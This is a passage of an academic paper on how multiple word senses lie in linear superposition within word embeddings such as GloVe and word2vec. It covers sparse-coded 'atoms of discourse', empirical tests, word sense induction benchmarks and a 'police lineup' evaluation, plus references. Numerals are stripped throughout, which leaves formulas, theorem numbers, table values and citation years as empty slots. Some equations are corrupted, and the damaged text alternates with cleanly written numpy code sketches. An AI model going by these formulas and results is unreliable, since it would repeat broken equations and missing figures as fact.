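# toy discourse covariance Σ; in practice it would be estimated from data
lam = rng.uniform(0.05, 2.0, size=d)           # eigenvalues of Σ
Q, _ = np.linalg.qr(rng.normal(size=(d, d)))   # random orthonormal eigenbasis
Sigma = Q @ np.diag(lam) @ Q.T

# a = n (Σ^{-1} + i)(Σ^{-1} + n·i)^{-1}, as in the proof of the theorem above
Sigma_inv = np.linalg.inv(Sigma)
I = np.eye(d)
A = n * (Sigma_inv + I) @ np.linalg.inv(Sigma_inv + n * I)

# in the eigenbasis of Σ, a is diagonal with entries (n + n λ_i) / (1 + n λ_i)
diag_pred = (n + n * lam) / (1 + n * lam)
diag_emp = np.diag(Q.T @ A @ Q)
print(np.allclose(np.sort(diag_pred), np.sort(diag_emp)))   # True

# directions with large λ (frequent discourses/words) get scaled down relative to others
print(diag_pred[np.argmax(lam)], diag_pred[np.argmin(lam)])
```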
the linear transformation is closely related to Σ, which describes the distribution of the discourses. if we choose a coordinate system such that Σ is a diagonal matrix with diagonal entries λi, then a will also be a diagonal matrix with diagonal en- tries (n + nλi)/( + nλi). this is smoothing the spectrum and essentially shrinks the directions cor- responding to large λi relatively to the other direc- tions. such directions are for common discourses and thus common words. empirically, we indeed observe that a shrinks the directions of common words. for example, its last right singular vector has, as nearest neighbors, the vectors for words like “with”, “as”, and “the.” note that empirically, a is not a diagonal matrix since the word vectors are not in the coordinate system mentioned. note: implications for glove and word vec. repeating the calculation in arora et al. ( ) for our new generative model, we can show that the solutions to glove and word vec training ob- jectives solve for the following vectors: v̂w =( Σ− + i )− / vw. since these other embeddings are the same as vw’s up to linear transformation, theorem (and the linearity assertion) still holds for them. empirically, we find that ( Σ− + i )− / is close to a scaled identity matrix (since ∥Σ− ∥ is small), so v̂w’s can be used as a surrogate of vw’s. experimental note: using better sentence em- beddings, sif embeddings. theorem implicitly uses the average of the neighboring word vectors as an estimate (mle) for the discourse vector. this estimate is of course also a simple sentence em- bedding, very popular in empirical nlp work and also reminiscent of word vec’s training objective. in practice, this naive sentence embedding can be improved by taking a weighted combination (often tf-idf) of adjacent words. the paper (arora et al., ) uses a simple twist to the generative model in (arora et al., ) to provide a better estimate of the discourse c called sif embedding, which is bet- ter for downstream tasks and surprisingly compet- itive with sophisticated lstm-based sentence em- beddings. it is a weighted average of word em- beddings in the window, with smaller weights for more frequent words (reminiscent of tf-idf). this weighted average is the mle estimate of c if above generative model is changed to: p(w|c) = αp(w) + ( − α) exp(vw · c) zc , where p(w) is the overall probability of word w in the corpus and α > is a constant (hyperparameter). the theory in the current paper works with sif embeddings as an estimate of the discourse c; in other words, in theorem we replace the average word vector with the sif vector of that window. em- pirically we find that it leads to similar results in test- ing our theory (section ) and better results in down- stream wsi applications (section ). therefore, sif embeddings are adopted in our experiments. . proof of linearity assertion now we use theorem to show how the linear- ity assertion follows. recall the thought experiment considered there. suppose word w has two distinct senses s and s . compute a word embedding vw for w. then hand-replace each occurrence of a sense of w by one of the new tokens s , s depending upon which one is being used. next, train separate embed- dings for s , s while keeping the other embeddings fixed. (nb: the classic clustering-based sense induc- tion (schutze, ; reisinger and mooney, ) can be seen as an approximation to this thought ex- periment.) theorem (main). assuming the model of sec- tion . 
, embeddings in the thought experiment above will satisfy ∥v_w − v̄_w∥ → 0 as the corpus length tends to infinity, where

v̄_w ≈ α v_s1 + β v_s2,   with   α = f1/(f1 + f2),  β = f2/(f1 + f2),

where f1 and f2 are the numbers of occurrences of s1, s2 in the corpus, respectively.

proof. suppose we pick a random sample of n windows containing w in the corpus. for each window, compute the average of the word vectors and then apply the linear transformation in theorem . the transformed vectors are i.i.d. estimates for v_w, but with high probability about an f1/(f1 + f2) fraction of the occurrences used sense s1 and f2/(f1 + f2) used sense s2, and the corresponding estimates for those two subpopulations converge to v_s1 and v_s2 respectively. thus by construction, the estimate for v_w is a linear combination of those for v_s1 and v_s2.

note. theorem (and hence the linearity assertion) holds already for the original model in arora et al. ( ) but with a = i, where i is the identity transformation. in practice, we find inducing the word vector requires a non-identity a, which is the reason for the modified model of section . . this also helps to address a nagging issue hiding in older clustering-based approaches such as reisinger and mooney ( ) and huang et al. ( ), which identified senses of a polysemous word by clustering the sentences that contain it. one imagines a good representation of the sense of an individual cluster is simply the cluster center. this turns out to be false: the closest words to the cluster center sometimes are not meaningful for the sense that is being captured; see table . indeed, the authors of reisinger and mooney ( ) seem aware of this because they mention "we do not assume that clusters correspond to traditional word senses. rather, we only rely on clusters to capture meaningful variation in word usage." we find that applying a to cluster centers makes them meaningful again. see also table .

towards wsi: atoms of discourse
now we consider how to do wsi using only word embeddings and the linearity assertion. our approach is fully unsupervised, and tries to induce senses for all words in one go, together with a vector representation for each sense.

table : four nearest words for some cluster centers that were computed for the word "access" by applying k-means on the estimated discourse vectors (see section . ) of random windows from wikipedia containing "access". after applying the linear transformation of theorem to the center, the nearest words become meaningful.
center 1: before = and, provide, providing, a; after = providing, provide, opportunities, provision
center 2: before = and, a, to, the; after = access, accessible, allowing, provide

given embeddings for all words, it seems unclear at first sight how to pin down the senses of tie using only ( ) since v_tie can be expressed in infinitely many ways as such a combination, and this is true even if the α_i's were known (and they aren't). to pin down the senses we will need to interrelate the senses of different words, for example, relate the "article of clothing" sense tie1 with shoe, jacket, etc. to do so we rely on the generative model of section . , according to which each unit vector in the embedding space corresponds to a micro-topic or discourse. empirically, discourses c and c′ tend to look similar to humans (in terms of nearby words) if their inner product is larger than . , and quite different if the inner product is smaller than . . so in the discussion below, a discourse should really be thought of as a small region rather than a point.
one imagines that the corpus has a "clothing" discourse that has a high probability of outputting the tie1 sense, and also of outputting related words such as shoe, jacket, etc. by ( ) the probability of being output by a discourse is determined by the inner product, so one expects that the vector for the "clothing" discourse has a high inner product with all of shoe, jacket, tie1, etc., and thus can stand as surrogate for v_tie1 in ( )! thus it may be sufficient to consider the following global optimization:

given word vectors {v_w} in ℜ^d and two integers k, m with k < m, find a set of unit vectors a_1, a_2, . . . , a_m such that

v_w = Σ_{j=1..m} α_{w,j} a_j + η_w   ( )

where at most k of the coefficients α_{w,1}, . . . , α_{w,m} are nonzero, and the η_w's are error vectors. here k is the sparsity parameter, m is the number of atoms, and the optimization minimizes the norms of the η_w's (the ℓ2-reconstruction error):

Σ_w ∥ v_w − Σ_{j=1..m} α_{w,j} a_j ∥².   ( )

both the a_j's and the α_{w,j}'s are unknowns, and the optimization is nonconvex. this is just sparse coding, useful in neuroscience (olshausen and field, ) and also in image processing, computer vision, etc. this optimization is a surrogate for the desired expansion of v_tie as in ( ), because one can hope that among a_1, . . . , a_m there will be directions corresponding to clothing, sports matches, etc., that will have high inner products with tie1, tie2, etc., respectively. furthermore, restricting m to be much smaller than the number of words ensures that the typical a_i needs to be reused to express multiple words.
we refer to the a_i's discovered by this procedure as atoms of discourse, since experimentation suggests that the actual discourse in a typical place in text (namely, vector c in ( )) is a linear combination of a small number, around - , of such atoms. implications of this for text analysis are left for future work.
relationship to clustering. sparse coding is solved using alternating minimization to find the a_i's that minimize ( ). this objective function reveals sparse coding to be a linear algebraic analogue of overlapping clustering, whereby the a_i's act as cluster centers and each v_w is assigned in a soft way to at most k of them (using the coefficients α_{w,j}, of which at most k are nonzero). in fact this clustering viewpoint is also the basis of the alternating minimization algorithm. in the special case when k = 1, each v_w has to be assigned to a single cluster, which is the familiar geometric clustering with squared ℓ2 distance. similar overlapping clustering in a traditional graph-theoretic setup (clustering while simultaneously cross-relating the senses of different words) seems more difficult but worth exploring.

experimental tests of theory
. test of gaussian walk model: induced embeddings
now we test the prediction of the gaussian walk model suggesting a linear method to induce embed-
aver- age the sif embeddings for all occurrences of w′ to obtain vector uw′ . the gaussian walk model says that there is a linear transformation that maps uw′ to vw′ , so solve the regression: argmina ∑ w ∥auw − vw∥ . ( ) we call the vectors auw the induced embeddings. we can test this method of inducing embeddings by holding out / words randomly, doing the regres- sion ( ) on the rest, and computing the cosine sim- ilarities between auw and vw on the heldout set of words. table shows that the average cosine similar- ity between the induced embeddings and the glove vectors is large. by contrast the average similar- ity between the average discourse vectors and the glove vectors is much smaller (about . ), illus- trating the need for the linear transformation. sim- ilar results are observed for the word vec and sn vectors (arora et al., ). . test of linearity assertion we do two empirical tests of the linearity assertion (theorem ). test . the first test involves the classic artificial polysemous words (also called pseudowords). first, pre-train a set w of word vectors on wikipedia with existing embedding methods. then, randomly pick m pairs of non-repeated words, and for each pair, replace each occurrence of either of the two words m pairs · relative error sn . . . glove . . . cos similarity sn . . . glove . . . table : the average relative errors and cosine sim- ilarities between the vectors of pseudowords and those predicted by theorem . m pairs of words are randomly selected and for each pair, all occurrences of the two words in the corpus is replaced by a pseu- doword. then train the vectors for the pseudowords on the new corpus. with a pseudoword. third, train a set w of vectors on the new corpus, while holding fixed the vectors of words that were not involved in the pseudowords. construction has ensured that each pseudoword has two distinct “senses”, and we also have in w the “ground truth” vectors for those senses. theorem implies that the embedding of a pseudoword is a lin- ear combination of the sense vectors, so we can com- pare this predicted embedding to the one learned in w . suppose the trained vector for a pseudoword w is uw and the predicted vector is vw, then the comparison criterion is the average relative error |s| ∑ w∈s ∥uw−vw∥ ∥vw∥ where s is the set of all the pseudowords. we also report the average cosine similarity between vw’s and uw’s. table shows the results for the glove and sn (arora et al., ) vectors, averaged over runs. when m is small, the error is small and the co- sine similarity is as large as . . even if m = · note that this discussion assumes that the set of pseu- dowords is small, so that a typical neighborhood of a pseu- doword does not consist of other pseudowords. otherwise the ground truth vectors in w become a bad approximation to the sense vectors. here w is trained while fixing the vectors of words not involved in pseudowords to be their pre-trained vectors in w . we can also train all the vectors in w from random initializa- tion. such w will not be aligned with w . then we can learn a linear transformation from w to w using the vectors for the words not involved in pseudowords, apply it on the vectors for the pseudowords, and compare the transformed vectors to the predicted ones. this is tested on word vec, resulting in relative errors between % and %, and cosine similarities between . and . . these results again support our analysis. vector type glove skip-gram sn cosine . . . 
table : the average cosine of the angles between the vectors of words and the span of vector represen- tations of its senses. the words tested are those in the wsi task of semeval . (i.e., about % of the words in the vocabulary are replaced by pseudowords), the cosine similarity re- mains above . , which is significant in the di- mensional space. this provides positive support for our analysis. test . the second test is a proxy for what would be a complete (but laborious) test of the linearity assertion: replicating the thought experiment while hand-labeling sense usage for many words in a cor- pus. the simpler proxy is as follows. for each word w, wordnet (fellbaum, ) lists its vari- ous senses by providing definition and example sen- tences for each sense. this is enough text (roughly a paragraph’s worth) for our theory to allow us to represent it by a vector —specifically, apply the sif sentence embedding followed by the linear transfor- mation learned as in section . . the text embed- ding for sense s should approximate the ground truth vector vs for it. then the linearity assertion pre- dicts that embedding vw lies close to the subspace spanned by the sense vectors. (note that this is a nontrivial event: in dimensions a random vector will be quite far from the subspace spanned by some other random vectors.) table checks this predic- tion using the polysemous words appearing in the wsi task of semeval . we tested three stan- dard word embedding methods: glove, the skip- gram variant of word vec, and sn (arora et al., ). the results show that the word vectors are quite close to the subspace spanned by the senses. experiments with atoms of discourse the experiments use -dimensional embeddings created using the sn objective in (arora et al., ) and a wikipedia corpus of billion tokens (wikime- dia, ), and the sparse coding is solved by stan- dard k-svd algorithm (damnjanovic et al., ). experimentation showed that the best sparsity pa- rameter k (i.e., the maximum number of allowed senses per word) is , and the number of atoms m is about . for the number of senses k, we tried plausible alternatives (based upon suggestions of many colleagues) that allow k to vary for differ- ent words, for example to let k be correlated with the word frequency. but a fixed choice of k = seems to produce just as good results. to understand why, realize that this method retains no information about the corpus except for the low dimensional word em- beddings. since the sparse coding tends to express a word using fairly different atoms, examining ( ) shows that ∑ j α w,j is bounded by approximately ∥vw∥ . so if too many αw,j ’s are allowed to be nonzero, then some must necessarily have small co- efficients, which makes the corresponding compo- nents indistinguishable from noise. in other words, raising k often picks not only atoms corresponding to additional senses, but also many that don’t. the best number of atoms m was found to be around . this was estimated by re-running the sparse coding algorithm multiple times with dif- ferent random initializations, whereupon substantial overlap was found between the two bases: a large fraction of vectors in one basis were found to have a very close vector in the other. thus combining the bases while merging duplicates yielded a basis of about the same size. around atoms are used by a large number of words or have no close-by words. they appear semantically meaningless and are ex- cluded by checking for this condition. 
the content of each atom can be discerned by looking at the nearby words in cosine similarity. some examples are shown in table . each word is represented using at most five atoms, which usually capture distinct senses (with some noise/mistakes). the senses recovered for tie and spring are shown in table . similar results can be obtained by using other word embeddings like word vec and glove. we also observe sparse coding procedures assign nonnegative values to most coefficients αw,j ’s even if they are left unrestricted. probably this is because the appearances of a word are best explained by what discourse is being used to generate it, rather than what discourses are not being used. we think semantically meaningless atoms —i.e., unex- plained inner products—exist because a simple language model such as ours cannot explain all observed co-occurrences due to grammar, stopwords, etc. it ends up needing smoothing terms. atom drowning instagram stakes membrane slapping orchestra conferences suicides twitter thoroughbred mitochondria pulling philharmonic meetings overdose facebook guineas cytosol plucking philharmonia seminars murder tumblr preakness cytoplasm squeezing conductor workshops poisoning vimeo filly membranes twisting symphony exhibitions commits linkedin fillies organelles bowing orchestras organizes stabbing reddit epsom endoplasmic slamming toscanini concerts strangulation myspace racecourse proteins tossing concertgebouw lectures gunshot tweets sired vesicles grabbing solti presentations table : some discourse atoms and their nearest words. by equation ( ), words most likely to appear in a discourse are those nearest to it. tie spring trousers season scoreline wires operatic beginning dampers flower creek humid blouse teams goalless cables soprano until brakes flowers brook winters waistcoat winning equaliser wiring mezzo months suspension flowering river summers skirt league clinching electrical contralto earlier absorbers fragrant fork ppen sleeved finished scoreless wire baritone year wheels lilies piney warm pants championship replay cable coloratura last damper flowered elk temperatures table : five discourse atoms linked to the words tie and spring. each atom is represented by its nearest words. the algorithm often makes a mistake in the last atom (or two), as happened here. relationship to topic models. atoms of discourse may be reminiscent of results from other automated methods for obtaining a thematic understanding of text, such as topic modeling, described in the sur- vey by blei ( ). this is not surprising since the model ( ) used to compute the embeddings is re- lated to a log-linear topic model by mnih and hinton ( ). however, the discourses here are computed via sparse coding on word embeddings, which can be seen as a linear algebraic alternative, resulting in fairly fine-grained topics. atoms are also reminis- cent of coherent “word clusters” detected in the past using brown clustering, or even sparse coding (mur- phy et al., ). the novelty in this paper is a clear interpretation of the sparse coding results as atoms of discourse, as well as its use to capture different word senses. testing wsi in applications while the main result of the paper is to reveal the linear algebraic structure of word senses within ex- isting embeddings, it is desirable to verify that this view can yield results competitive with earlier sense embedding approaches. we report some tests be- low. 
we find that common word embeddings per- form similarly with our method; for concreteness we use induced embeddings described in section . . they are evaluated in three tasks: word sense induc- tion task in semeval (manandhar et al., ), word similarity in context (huang et al., ), and a new task we called police lineup test. the results are compared to those of existing embedding based approaches reported in related work (huang et al., ; neelakantan et al., ; mu et al., ). . word sense induction in the wsi task in semeval , the algorithm is given a polysemous word and about pieces of texts, each using it according to a single sense. the algorithm has to cluster the pieces of text so that those with the same sense are in the same cluster. the evaluation criteria are f-score (artiles et al., ) and v-measure (rosenberg and hirschberg, ). the f-score tends to be higher with a smaller number of clusters and the v-measure tends to be higher with a larger number of clusters, and fair eval- uation requires reporting both. given a word and its example texts, our algorithm uses a bayesian analysis dictated by our theory to compute a vector uc for each piece of text c and and then applies k-means on these vectors, with the small twist that sense vectors are assigned to near- est centers based on inner products rather than eu- clidean distances. table shows the results. computing vector uc. for word w we start by com- puting its expansion in terms of atoms of discourse (see ( ) in section ). in an ideal world the nonzero coefficients would exactly capture its senses, and each text containing w would match to one of these nonzero coefficients. in the real world such deter- ministic success is elusive and one must reason us- ing bayes’ rule. for each atom a, word w and text c there is a joint distribution p(w, a, c) describing the event that atom a is the sense being used when word w was used in text c. we are interested in the posterior distribution: p(a|c, w) ∝ p(a|w)p(a|c)/p(a). ( ) we approximate p(a|w) using theorem , which suggests that the coefficients in the expansion of vw with respect to atoms of discourse scale according to probabilities of usage. (this assertion involves ig- noring the low-order terms involving the logarithm in the theorem statement.) also, by the random walk model, p(a|c) can be approximated by exp(⟨va, vc⟩) where vc is the sif embedding of the context. fi- nally, since p(a) = ec[p(a|c)], it can be empirically estimated by randomly sampling c. the posterior p(a|c, w) can be seen as a soft de- coding of text c to atom a. if texts c , c both contain w, and they were hard decoded to atoms a , a re- spectively then their similarity would be ⟨va , va ⟩. with our soft decoding, the similarity can be defined by taking the expectation over the full posterior: similarity(c , c ) = eai∼p(a|ci,w),i∈{ , }⟨va , va ⟩, ( ) = ⟨ ∑ a p(a |c , w)va , ∑ a p(a |c , w)va ⟩ . at a high level this is analogous to the bayesian polysemy model of reisinger and mooney ( ) and brody and lapata ( ), except that they in- troduced separate embeddings for each sense clus- ter, while here we are working with structure already existing inside word embeddings. method v-measure f-score (huang et al., ) . . (neelakantan et al., ) . . (mu et al., ), k = . . (mu et al., ), k = . . ours, k = . . ours, k = . . ours, k = . . ours, k = . . table : performance of different vectors in the wsi task of semeval . the parameter k is the num- ber of clusters used in the methods. 
rows are di- vided into two blocks, the first of which shows the results of the competitors, and the second shows those of our algorithm. best results in each block are in boldface. the last equation suggests defining the vector uc for the text c as uc = ∑ a p(a|c, w)va, ( ) which allows the similarity between two text pieces to be expressed via the inner product of their vectors. results. the results are reported in table . our approach outperforms the results by huang et al. ( ) and neelakantan et al. ( ). when com- pared to mu et al. ( ), for the case with centers, we achieved better v-measure but lower f-score, while for centers, we achieved lower v-measure but better f-score. . word similarity in context the dataset consists of around pairs of words, along with the contexts the words occur in and the ground-truth similarity scores. the evaluation cri- terion is the correlation between the ground-truth scores and the predicted ones. our method computes the estimated sense vectors and then the similarity as in section . . we compare to the baselines that sim- ply use the cosine similarity of the glove/skip-gram vectors, and also to the results of several existing sense embedding methods. results. table shows that our result is better than those of the baselines and mu et al. ( ), but slightly worse than that of huang et al. ( ). method spearman coefficient glove . skip-gram . (huang et al., ) . (neelakantan et al., ) . (mu et al., ) . ours . table : the results for different methods in the task of word similarity in context. the best result is in boldface. our result is close to the best. note that huang et al. ( ) retrained the vectors for the senses on the corpus, while our method de- pends only on senses extracted from the off-the-shelf vectors. after all, our goal is to show word senses already reside within off-the-shelf word vectors. . police lineup evaluating wsi systems can run into well-known difficulties, as reflected in the changing metrics over the years (navigli and vannella, ). inspired by word-intrusion tests for topic coherence (chang et al., ), we proposed a new simple test, which has the advantages of being easy to understand, and ca- pable of being administered to humans. the testbed uses polysemous words and their senses according to wordnet. each sense is represented by related words, which were col- lected from wordnet and online dictionaries by col- lege students, who were told to identify most rele- vant other words occurring in the online definitions of this word sense as well as in the accompany- ing illustrative sentences. these are considered as ground truth representation of the word sense. these words are typically not synonyms. for example, for the tool/weapon sense of axe they were “handle, harvest, cutting, split, tool, wood, battle, chop.” the quantitative test is called police lineup. first, randomly pick one of these polysemous words. second, pick the true senses for the word and then add randomly picked senses from other words so that there are n senses in total, where each sense is represented by related words as mentioned. fi- nally, the algorithm (or human) is given the polyse- mous word and a set of n senses, and has to identify the true senses in this set. table gives an example. 
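before turning to the police lineup example below, here is a minimal numpy sketch of the soft decoding used in sections . and . above: p(a | c, w) ∝ p(a | w)·p(a | c)/p(a), followed by u_c = Σ_a p(a | c, w)·v_a, with the similarity of two texts given by ⟨u_c1, u_c2⟩. all inputs are random toy placeholders, and the exact sif weighting a/(a + p(w)) is carried over from the sif paper as an assumption rather than taken from this text:

```python
import numpy as np

rng = np.random.default_rng(3)
d, m = 50, 40

# assumed toy inputs: unit-norm discourse atoms, a word's sparse coefficients
# over those atoms, and context words with their corpus frequencies
atoms = rng.normal(size=(m, d))
atoms /= np.linalg.norm(atoms, axis=1, keepdims=True)
alpha_w = np.zeros(m)                 # α_{w,·}: sparse expansion of word w
alpha_w[rng.choice(m, size=5, replace=False)] = rng.uniform(0.2, 1.0, size=5)

def sif_embed(word_vecs, word_freqs, a=1e-3):
    """weighted average of word vectors; rarer words get larger weight.
    the weighting a/(a + p(w)) follows the sif paper (an assumption here)."""
    w = a / (a + np.asarray(word_freqs))
    return (w[:, None] * word_vecs).mean(axis=0)

def posterior_over_atoms(v_context, alpha_w, atoms, p_a):
    """p(a | c, w) ∝ p(a | w) · p(a | c) / p(a), with p(a|w) ∝ α_{w,a}
    and p(a|c) ∝ exp(⟨v_a, v_c⟩)."""
    p_a_given_w = alpha_w / alpha_w.sum()
    p_a_given_c = np.exp(atoms @ v_context)
    p_a_given_c /= p_a_given_c.sum()
    post = p_a_given_w * p_a_given_c / p_a
    return post / post.sum()

# p(a) estimated by averaging p(a|c) over randomly sampled contexts
sample_ctx = rng.normal(size=(200, d))
pc = np.exp(sample_ctx @ atoms.T)
p_a = (pc / pc.sum(axis=1, keepdims=True)).mean(axis=0)

# two toy contexts containing w; real contexts would use corpus vectors and frequencies
v_c1 = sif_embed(rng.normal(size=(10, d)), rng.uniform(1e-5, 1e-2, size=10))
v_c2 = sif_embed(rng.normal(size=(10, d)), rng.uniform(1e-5, 1e-2, size=10))

u1 = posterior_over_atoms(v_c1, alpha_w, atoms, p_a) @ atoms   # u_c = Σ_a p(a|c,w) v_a
u2 = posterior_over_atoms(v_c2, alpha_w, atoms, p_a) @ atoms
print(float(u1 @ u2))   # similarity(c1, c2) = ⟨u_c1, u_c2⟩
```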
word senses bat navigate nocturnal mouse wing cave sonic fly dark used hitting ball game match cricket play baseball wink briefly shut eyes wink bate quickly action whereby legal court law lawyer suit bill judge loose ends two loops shoelaces tie rope string horny projecting bird oral nest horn hard food table : an example of the police lineup test with n = . the algorithm (or human subject) is given the polysemous word “bat” and n = senses each of which is represented as a list of words, and is asked to identify the true senses belonging to “bat” (high- lighted in boldface for demonstration). algorithm our method for the police lineup test input: word w, list s of senses (each has words) output: t senses out of s : heuristically find inflectional forms of w. : find atoms for w and each inflectional form. let u denote the union of all these atoms. : initialize the set of candidate senses cw ← ∅, and the score for each sense l to score(l) ←−∞ : for each atom a ∈ u do : rank senses l ∈ s by score(a, l) = s(a, l)−sla + s(w, l) − slv : add the two senses l with highest score(a, l) to cw, and update their scores score(l) ← max{score(l), score(a, l)} : return the t senses l ∈ cs with highest score(l) our method (algorithm ) uses the similarities between any word (or atom) x and a set of words y , defined as s(x, y ) = ⟨vx, vy ⟩ where vy is the sif embedding of y . it also uses the average simi- larities: sya = ∑ a∈a s(a, y ) |a| , s y v = ∑ w∈v s(w, y ) |v | where a are all the atoms, and v are all the words. we note two important practical details. first, while we have been using atoms of discourse as a proxy for word sense, these are too coarse-grained: the to- tal number of senses (e.g., wordnet synsets) is far greater than . thus the score(·) function uses both the atom and the word vector. second, some words are more popular than the others—i.e., have large components along many atoms and words— which seems to be an instance of the smoothing . . . . recall . . . . p re c is io n our method mu et al, word vec native speaker non-native speaker number of meanings m . . . . recall precision a b figure : precision and recall in the police lineup test. (a) for each polysemous word, a set of n = senses containing the ground truth senses of the word are presented. human subjects are told that on average each word has . senses and were asked to choose the senses they thought were true. the algorithms select t senses for t = , , . . . , . for each t, each algorithm was run times (standard deviations over the runs are too small to plot). (b) the performance of our method for t = and n = , , . . . , . phenomenon alluded to in footnote . the penalty terms sla and s l v lower the scores of senses l con- taining such words. finally, our algorithm returns t senses where t can be varied. results. the precision and recall for different n and t (number of senses the algorithm returns) are pre- sented in figure . our algorithm outperforms the two selected competitors. for n = and t = , our algorithm succeeds with precision % and re- call %, and performance remains reasonable for n = . giving the same test to humans for n = (see the left figure) suggests that our method per- forms similarly to non-native speakers. other word embeddings can also be used in the test and achieved slightly lower performance. for n = and t = , the precision/recall are lower by the following amounts: glove . %/ . %, nnse (matrix factorization on pmi to rank by murphy et al. ( )) %/ %. 
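the police lineup scorer (algorithm above) is mostly inner products and bookkeeping once the atoms of w and the sif embeddings of the candidate senses are available. the sketch below uses random toy placeholders for every input and skips the inflectional-forms step, so it only illustrates the scoring and selection logic, not the full pipeline:

```python
import numpy as np

rng = np.random.default_rng(4)
d, n_atoms, n_vocab = 50, 40, 500

# toy placeholders for the quantities the algorithm assumes: the word's vector,
# the atoms found for it, sif embeddings of the n candidate senses, and
# embeddings of all atoms / a vocabulary sample (for the penalty terms)
v_w = rng.normal(size=d)
atoms = rng.normal(size=(n_atoms, d))           # all discourse atoms
word_vecs = rng.normal(size=(n_vocab, d))       # vectors of all words
atoms_of_w = atoms[rng.choice(n_atoms, size=5, replace=False)]
n_senses = 20
sense_vecs = rng.normal(size=(n_senses, d))     # sif embeddings of candidate senses

def lineup_scores(v_w, atoms_of_w, sense_vecs, atoms, word_vecs):
    """score(a, l) = s(a, l) − s̄_atoms(l) + s(w, l) − s̄_words(l); each atom
    promotes its two best-scoring senses, and each sense keeps its best score."""
    penalty_a = sense_vecs @ atoms.T             # s(a', l) for every atom a'
    penalty_v = sense_vecs @ word_vecs.T         # s(w', l) for every word w'
    base = sense_vecs @ v_w - penalty_v.mean(axis=1)   # s(w, l) − s^l_v
    best = np.full(len(sense_vecs), -np.inf)
    for a in atoms_of_w:
        score_a = sense_vecs @ a - penalty_a.mean(axis=1) + base
        for l in np.argsort(score_a)[-2:]:       # two highest-scoring senses for atom a
            best[l] = max(best[l], score_a[l])
    return best

t = 4
scores = lineup_scores(v_w, atoms_of_w, sense_vecs, atoms, word_vecs)
print(np.argsort(scores)[-t:][::-1])             # indices of the t senses returned
```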
conclusions different senses of polysemous words have been shown to lie in linear superposition inside standard word embeddings like word vec and glove. this has also been shown theoretically building upon human subjects are graduate students from science or engi- neering majors at major u.s. universities. non-native speakers have to years of english language use/learning. previous generative models, and empirical tests of this theory were presented. a priori, one imagines that showing such theoretical results about the in- ner structure of modern word embeddings would be hopeless since they are solutions to complicated nonconvex optimization. a new wsi method is also proposed based upon these insights that uses only the word embeddings and sparse coding, and shown to provide very com- petitive performance on some wsi benchmarks. one novel aspect of our approach is that the word senses are interrelated using one of about dis- course vectors that give a succinct description of which other words appear in the neighborhood with that sense. our method based on sparse coding can be seen as a linear algebraic analog of the cluster- ing approaches, and also gives fine-grained thematic structure reminiscent of topic models. a novel police lineup test was also proposed for testing such wsi methods, where the algorithm is given a word w and word clusters, some of which belong to senses of w and the others are distractors belonging to senses of other words. the algorithm has to identify the ones belonging to w. we con- jecture this police lineup test with distractors will challenge some existing wsi methods, whereas our method was found to achieve performance similar to non-native speakers. acknowledgements we thank the reviewers and the action editor of tacl for helpful feedback and thank the editors for granting special relaxation of the page limit for our paper. this work was supported in part by nsf grants ccf- , dms- , simons in- vestigator award, simons collaboration grant, and onr-n - - - . tengyu ma was addition- ally supported by the simons award in theoretical computer science and by the ibm ph.d. fellow- ship. references sanjeev arora, yuanzhi li, yingyu liang, tengyu ma, and andrej risteski. . a latent variable model approach to pmi-based word embeddings. trans- action of association for computational linguistics, pages – . sanjeev arora, yingyu liang, and tengyu ma. . a simple but tough-to-beat baseline for sentence embed- dings. in in proceedings of international conference on learning representations. javier artiles, enrique amigó, and julio gonzalo. . the role of named entities in web people search. in proceedings of the conference on empirical methods in natural language processing, pages – . yoshua bengio, réjean ducharme, pascal vincent, and christian jauvin. . a neural probabilistic lan- guage model. journal of machine learning research, pages – . david m. blei. . probabilistic topic models. com- munication of the association for computing machin- ery, pages – . samuel brody and mirella lapata. . bayesian word sense induction. in proceedings of the th confer- ence of the european chapter of the association for computational linguistics, pages – . jonathan chang, sean gerrish, chong wang, jordan l. boyd-graber, and david m. blei. . reading tea leaves: how humans interpret topic models. in advances in neural information processing systems, pages – . kenneth ward church and patrick hanks. . word association norms, mutual information, and lexicogra- phy. 
computational linguistics, pages – . ivan damnjanovic, matthew davies, and mark plumb- ley. . smallbox – an evaluation framework for sparse representations and dictionary learning al- gorithms. in international conference on latent vari- able analysis and signal separation, pages – . antonio di marco and roberto navigli. . clus- tering and diversifying web search results with graph- based word sense induction. computational linguis- tics, pages – . manaal faruqui, yulia tsvetkov, dani yogatama, chris dyer, and noah a. smith. . sparse overcomplete word vector representations. in proceedings of as- sociation for computational linguistics, pages – . christiane fellbaum. . wordnet: an electronic lexical database. mit press. john rupert firth. . a synopsis of linguistic theory, - . studies in linguistic analysis. alex gittens, dimitris achlioptas, and michael w ma- honey. . skip-gram – zipf + uniform = vector additivity. in proceedings of the th annual meet- ing of the association for computational linguistics (volume : long papers), volume , pages – . thomas l. griffiths, mark steyvers, and joshua b. tenenbaum. . topics in semantic representation. psychological review, pages – . eric h. huang, richard socher, christopher d. manning, and andrew y. ng. . improving word representa- tions via global context and multiple word prototypes. in proceedings of the th annual meeting of the asso- ciation for computational linguistics, pages – . ignacio iacobacci, mohammad taher pilehvar, and roberto navigli. . sensembed: learning sense embeddings for word and relational similarity. in pro- ceedings of association for computational linguis- tics, pages – . omer levy and yoav goldberg. . neural word embedding as implicit matrix factorization. in ad- vances in neural information processing systems, pages – . suresh manandhar, ioannis p klapaftis, dmitriy dligach, and sameer s pradhan. . semeval : task : word sense induction & disambiguation. in pro- ceedings of the th international workshop on seman- tic evaluation, pages – . tomas mikolov, ilya sutskever, kai chen, greg s. cor- rado, and jeff dean. a. distributed represen- tations of words and phrases and their composition- ality. in advances in neural information processing systems, pages – . tomas mikolov, wen-tau yih, and geoffrey zweig. b. linguistic regularities in continuous space word representations. in proceedings of the confer- ence of the north american chapter of the associa- tion for computational linguistics: human language technologies, pages – . andriy mnih and geoffrey hinton. . three new graphical models for statistical language modelling. in proceedings of the th international conference on machine learning, pages – . jiaqi mu, suma bhat, and pramod viswanath. . ge- ometry of polysemy. in proceedings of international conference on learning representations. brian murphy, partha pratim talukdar, and tom m. mitchell. . learning effective and interpretable semantic models using non-negative sparse embed- ding. in proceedings of the th international confer- ence on computational linguistics, pages – . roberto navigli and daniele vannella. . semeval : task : word sense induction and disambigua- tion within an end-user application. in second joint conference on lexical and computational semantics, pages – . arvind neelakantan, jeevan shankar, re passos, and andrew mccallum. . efficient nonparametric estimation of multiple embeddings per word in vec- tor space. 
